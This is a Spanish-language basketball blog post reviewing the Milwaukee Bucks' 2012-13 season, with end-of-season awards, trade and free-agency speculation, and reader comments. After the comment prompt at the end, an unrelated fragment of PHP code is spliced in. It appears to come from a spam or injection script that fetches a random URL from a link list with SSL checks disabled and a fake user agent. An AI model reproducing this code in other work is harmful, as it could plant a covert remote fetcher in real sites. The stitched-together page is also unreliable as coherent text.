Milwaukee Bucks: Aprobado

04 de July de 2013 por txusma

Los Bucks se han clasificado para Playoffs pero lo han conseguido simplemente porque han sido los menos malos de los malos del Este. No han llegado al 50% de victorias, han recibido una media de 100 por partido (los vigésimos en este apartado) y han acumulado pérdidas y malos porcentajes por doquier. Acerté de lleno en el pronóstico concreto de principio de temporada pero confieso que me esperaba mucho más nivel. El modo como fueron barridos en primera ronda por los Heat demostró que en la NBA deberían replantearse si un equipo por debajo del 50% de victorias ha de clasificarse para Playoffs. Casi mejor que hubieran dejado su sitio a Jazz o Mavs…

La impredicibilidad de la que hablaba en el análisis se convirtió en ineficiencia. El duo Jennings-Ellis ha tirado con un 40% de acierto, no ha generado mucho juego y ha perdido más de 5 balones por partido. A pesar de no haber defendido mal se han cumplido los peores pronósticos y la idea de juntar a estos dos jugadores de corte similar ha demostrado ser errónea. Mike Dunleavy ha cubierto como ha podido el agujero en la posición de alero a pesar de no salir casi nunca de titular y Ersan Ilyasova tardó en despertar y darse cuenta de que la temporada había comenzado. El jugador turco superó un horrendo inicio de temporada que nos hizo pensar a todos que el Club del Cazo Mix había conseguido otro socio pero se activó con el cambio de entrenador y ha acabado promediando 17’2 puntos y 9 rebotes después del All-Star. Y es que el 3 de enero, con el equipo en el 50% de victorias, Scott Skiles abandonó el barco aquejado de dolores de cabeza y mareos. Ya sabemos lo que le gustan a Skiles los jugadores como Ellis y Jennings. Jim Boylan fue su sustituto y la situación no mejoró nada en absoluto. Al menos podemos apuntar a su favor la promoción de Larry Sanders que ha acabado resultando una de las sorpresa agradables de la temporada. Poca gente apostaba por él a principio de temporada y algunos lo considerábamos moneda de cambio para algún traspaso, pero lo cierto es que el ex jugador de VCU ha explotado y ha confirmado lo que apuntaba en la universidad: que es un buen reboteador y sobretodo un gran taponador.

Para añadir más confusión a la plantilla, en febrero llegaba JJ Redick a cambio de un arrinconado Tobias Harris y Beno Udrih. Ya en su momento no pareció una gran idea. Añadir un jugador de relativo nivel que estaba mostrando su mejor juego desde que llegara a la liga a un backcourt formado por 2 jugadores con personalidad que juegan 37 minutos por partido parece más la idea de un científico loco en busca de la piedra filosofal que la de un GM. Si además le sumamos a la situación el hecho de que los 3 jugadores estaban en último año de contrato, el cóctel explosivo incluso ganaba sabor y gusto. Resultado: Redick vio como se desplomaban sus promedios debido al cambio de rol y Tobias Harris maravillaba en Orlando. Para más inri ayer mismó se confirmaba que Redick abandona los Bucks y viaja a LA para unirse a los Clippers de Doc Rivers. Ni como recambio de Monta Ellis ha servido…

PREMIOS

MVP: Mi moral me impide otorgar al premio a los máximo anotadores del equipo así que se lo voy a dar a Larry Sanders que se ha quedado muy cerquita del doble-doble tras promediar 9’8 puntos y 9’5 rebotes por partido. Pero lo más impactante han sido sus 2’8 tapones por partido que le han valido para terminar segundo en la clasificación de la liga por detrás de . Aquí hay jugador defensivo para años.

Rookie: Detalles de calidad de John Henson. Finaliza el año con 6 puntos y 4’7 rebotes por partido.

Sorpresa: Evidentemente la mayor ha sido la de Larry Sanders pero no quiero dejar de destacar a Mike Dunleavy. A sus 32 años ha sido el mejor alero del equipo con 10’5 puntos, 4 rebotes y un 42% de acierto desde más allá de la línea de 3.

Decepción: Podríamos nombrar a Samuel Dalembert o Drew Gooden pero vamos a apuntar más alto. Brandon Jennings acaba la temporada con 17’5 puntos y 6’5 asistencias pero con una cierto en el tiro por debajo del 40%. Ha de mejorar este aspecto si quiere afianzarse de una vez en la liga.

Esfuerzo en vano: Tras el All-Star los Bucks lucharon por llegar y mantenerse en el 50% de victorias pero aunque se clasificaron para los Playoffs, no lo consiguieron. Y eso a pesar de que tanto Ersan Ilyasova como Monta Ellis mejoraron sus promedios y porcentajes de acierto. El turco pasó de 11’2 puntos, 6’2 rebotes y 44% a 17’2 puntos, 9 rebotes y un 48%, y el ex de los Warriors de 18’4 puntos, 5’5 asistencias y un 40% a 20’6 puntos, 7 asistencias y un 44%.

JUGANDO A GM

Monta Ellis ha decidido salir al mercado y jugadores que interesaban a la franquicia como JJ Redick, Tony Allen, Eric Bledsoe o Chase Budinger ya han firmado por otros equipos. Queda claro que Milwaukee no es un sitio por el que los agentes libres se peleen. Ardua tarea la de formar un equipo ganador con tan pequeño mercado. Tal vez deberíamos valorar más los logros de esta pequeña franquicia.

Suenan rumores para incorporar a JR Smith pero el jugador ya ha declarado que si la oferta es comparable prefiere quedarse en NY (¿y quién no?). Josh Smith seguro que tiene la misma idea. No creo que quiera venirse a Milwaukee con equipos como Dallas o Detroit rondándole. Sinceramente, dan ganas de tirar la toalla. Nos tendremos que conformar con jugadores de segunda fila sinó queremos acabar sobrepagando mucho a algún Cazo Mix. Precisamente el nombre que más suena es OJ Mayo. Veremos por cuánto nos sale la broma.

Renovaremos a Brandon Jennings (suerte que es agente libre restringido) y en el mercado de agentes libres buscaremos algún jugador interior apañado que pueda ser suplente de Larry Sanders. Tal vez Zaza Pachulia. Carl Lanry también interesa y no vendría mal para formar un juego interior muy interesante y dinámico junto Sanders e Ilyasova. De todos modos no sé como rellenar los puestos de escolta y alero. Mike Dunleavy puede volar a Chicago (y no le culpo) y ahora mismo solo tenemos en nómina a Mbah-a-Moute en alguna de estas 2 posiciones. Nombres que se me ocurren: Gerald Henderson, Corey Brewer, Chris Copeland, Al Farouq Aminu, Marco Bellinelli, Nick Young… No suena apasionante, ¿verdad?

Comenta

6 comentarios a esta entrada

  1. Joaq dice:
    #1

    Increible o capaz que no tanto, Pablo Prigioni renovo por 3 años! Llega hasta los 39 en la NBA (si el cuerpo lo permite obvio), que grande!

      Citar

  2. Simon dice:
    #2

    Pufff bastante han hecho los Bucks ya con conseguir armar un equipo medio decente… Conseguir alli PO es la panacea ( aunque sea gracias al nivel paupérrimo de la conferencia ) pero es que hay equipos que son un verdadero paquete… te pones a pensar cosas que los mejoran y dices… ¿ tengo dinero ? NO. ¿ Alguien quiere jugar allí ? No. ¿ Puedo hacer algún traspaso en el que salga beneficiado? No porque todos mis jugadores son de nivel medio/bajo con contratos de nivel alto o de nivel medio/alto en el mejor de los casos…

      Citar

  3. Sancho88 dice:
    #3

    Un buen movimiento para los Bucks sería un intercambio Gooden+Henson a cambio de Marcus Thornton. Así tendrían su metralleta desde fuera, un tipo que el año pasado no jugó mucho y por eso no anotó demasiado, pero venía de promediar más de 18 puntos. A los Kings les hace falta varios jugadores en la pintura que den altura y recambio para Cousins, y les sobran escoltas. Blanco y en botella

      Citar

  4. Simon dice:
    #4

    jejejje barriendo para Kings.xD

      Citar

  5. Sancho88 dice:
    #5

    JEJEJE, siempre a favor de obra. Pero como en los Bucks no quieren a Gooden… pues oye, a los Kings no les vendría nada mal. Y si no es Henson el otro para cuadrar salarios, Ayón también nos vale. Si es para darle 15 minutos de descanso al Cousins, que siempre se borra por 6 faltas, se le va la olla, se encara contra alguien y lo expulsan, etc. No es para más, su rol sería ese, darle descansos al perturbado de Cousins. Ayón lo podría hacer. Es que tenemos ahí a la castaña de Hayes sin aportar nada y ya da pena el hombre, no vale ni para rotar 15 minutos en uno de los peores equipos de la NBA.

      Citar

  6. rumbero dice:
    #6

    Mucho más interesante quedarse con Henson no? No ha jugado mucho y tampoco lo he visto demasiado pero un día que cacé un Thunder – Bucks creo, el tio jugó casi todo el partido y se fue a 25/15 o así. Brazacos kilometricos aunque sea un poco tirillas, pero buen defensor. Y joven. Igual es un poco perfil Sanders pero me parece una buena pieza por parte de los Bucks

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>